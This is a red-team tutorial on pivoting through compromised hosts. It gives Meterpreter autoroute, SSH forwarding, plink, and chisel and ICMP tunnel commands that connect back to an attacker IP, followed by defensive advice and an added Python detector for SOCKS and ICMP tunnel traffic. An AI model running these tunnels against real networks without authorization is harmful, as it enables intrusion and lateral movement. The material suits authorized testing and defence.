
Pivoting Commands

Pivoting for Red Teamers

Pivoting in Red Team Operations: A Complete Guide

Introduction

In a real-world red team operation, gaining initial access is just the beginning. The real challenge is pivoting: using that access to move laterally, escalate privileges, and compromise additional systems within the network.

What is Pivoting?

Pivoting is a technique used to route traffic through a compromised host to access internal networks that are not directly reachable.

Types of Pivoting

  • Network Pivoting: Routes network traffic through a compromised host (e.g., SSH Tunneling, Metasploit, ProxyChains).
  • Port Forwarding: Exposes specific ports from an internal machine to the attacker (e.g., SSH Local Port Forwarding).

Step 1: Pivoting Using Metasploit

Setting Up a Pivot via Meterpreter

meterpreter> run autoroute -s 192.168.1.0/24
meterpreter> background

Metasploit modules will now route traffic destined for 192.168.1.0/24 through the Meterpreter session on this compromised host.

Step 2: Pivoting with SSH Tunneling

Using Local Port Forwarding

ssh -L 8080:192.168.1.100:80 user@pivot-host

Using Dynamic Port Forwarding (SOCKS Proxy)

ssh -D 9050 user@pivot-host

Step 3: Pivoting with Chisel

Setup on Attacker Machine

./chisel server --reverse --port 8080

Setup on Compromised Host

./chisel client <attacker-ip>:8080 R:1080:socks

Step 4: Pivoting with RDP (Remote Desktop Protocol)

plink.exe -ssh -L 3389:192.168.1.100:3389 user@pivot-host

Step 5: Exploiting Firewall Rules with ICMP Tunnel

Start ICMP Server on Attacker Machine

./icmp-server eth0

Start ICMP Client on Compromised Host

./icmp-client <attacker-ip>

How to Defend Against Pivoting Attacks

  • Segment Networks – Isolate DMZ, internal, and user networks.
  • Use Firewalls – Block unnecessary outbound traffic.
  • Monitor SOCKS & Proxy Usage – Detect unusual traffic.
  • Implement EDR Solutions – Detect tunneling and backdoors.
  • Disable Unused Services – Prevent lateral movement.
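As an added example (not part of the original post) of the "Monitor SOCKS & Proxy Usage" and "Detect tunneling" points above, the following Python scans constructed flow records for the SOCKS4/SOCKS5 client handshake that ssh -D and chisel's socks endpoint carry and for ICMP echo payloads larger than a normal ping; the Flow record format, the 64-byte ICMP threshold and the sample flows are assumptions.

```python
# Added example, not from the original post: a small detector for the traffic
# the pivoting tools above generate, run over constructed flow records.
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass
class Flow:
    proto: str      # "tcp" or "icmp" (assumed record format)
    dport: int      # destination port, 0 for ICMP
    payload: bytes  # first bytes of the client-side payload

# Default listener ports from the commands above: chisel R:1080:socks, ssh -D 9050
SOCKS_PORTS = {1080, 9050}
# Default ping payloads are 56 bytes (Linux) or 32 bytes (Windows); tunnels pack more
MAX_PING_PAYLOAD = 64

def is_socks5_greeting(p: bytes) -> bool:
    """RFC 1928 client greeting: VER=0x05, NMETHODS, then exactly NMETHODS bytes."""
    return len(p) >= 3 and p[0] == 0x05 and len(p) == 2 + p[1]

def is_socks4_connect(p: bytes) -> bool:
    """SOCKS4 request: VN=0x04, CD=0x01 (CONNECT), port, IPv4, USERID, NUL."""
    return len(p) >= 9 and p[0] == 0x04 and p[1] == 0x01 and p[-1] == 0x00

def classify(f: Flow) -> Optional[str]:
    """Return a detection label for one flow, or None if nothing looks like a pivot."""
    if f.proto == "tcp":
        if is_socks5_greeting(f.payload):
            return "socks5-handshake"
        if is_socks4_connect(f.payload):
            return "socks4-connect"
        if f.dport in SOCKS_PORTS:
            return "traffic-to-default-socks-port"
    elif f.proto == "icmp" and len(f.payload) > MAX_PING_PAYLOAD:
        return "icmp-tunnel-candidate"
    return None

def scan(flows: List[Flow]) -> List[Tuple[int, str]]:
    """Return (index, label) for every flow that triggers a detection."""
    return [(i, lbl) for i, f in enumerate(flows) if (lbl := classify(f))]

# Constructed sample: SOCKS5 greeting to 9050, SOCKS4 CONNECT to 1080,
# a TLS ClientHello to 443, a normal 56-byte ping, and a 1024-byte ICMP payload.
SAMPLE_FLOWS = [
    Flow("tcp", 9050, b"\x05\x01\x00"),
    Flow("tcp", 1080, b"\x04\x01\x00\x50\xc0\xa8\x01\x64\x00"),
    Flow("tcp", 443, b"\x16\x03\x01\x00\xa5\x01"),
    Flow("icmp", 0, bytes(56)),
    Flow("icmp", 0, bytes(1024)),
]
```

Port-based matching alone is weak (tunnels can listen anywhere), so the handshake and payload-size checks are the ones worth feeding into a sensor.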

Conclusion

Pivoting is a critical skill for red teamers, allowing attackers to move deeper into a network after initial access.

⚠️ Reminder: These techniques should only be used for legal penetration testing and red team assessments.

The commands above can be automated with a custom script.
